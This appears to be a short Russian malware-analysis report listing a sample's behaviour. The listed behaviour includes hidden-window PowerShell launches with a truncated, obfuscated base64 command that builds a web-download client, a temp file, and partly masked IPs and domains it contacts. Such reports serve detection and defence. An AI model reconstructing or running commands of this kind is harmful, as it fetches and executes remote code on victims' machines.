Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABmAFgAQgBvAFoAMQB4AD0AKAAnAFYAQwBBAEQAQQBBACcAKwAnAFUAJwApADsAJABPAF8AbwBjAEEAVQBCAGMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1548
- %TEMP%\1168369.cvr
- '35.##9.240.78':80
- '17#.#28.25.132':80
- DNS ASK ud####amdhall.com
- DNS ASK li####ylescape.com
- DNS ASK pr#####y-in-vietnam.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABmAFgAQgBvAFoAMQB4AD0AKAAnAFYAQwBBAEQAQQBBACcAKwAnAFUAJwApADsAJABPAF8AbwBjAEEAVQBCAGMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAH...' (со скрытым окном)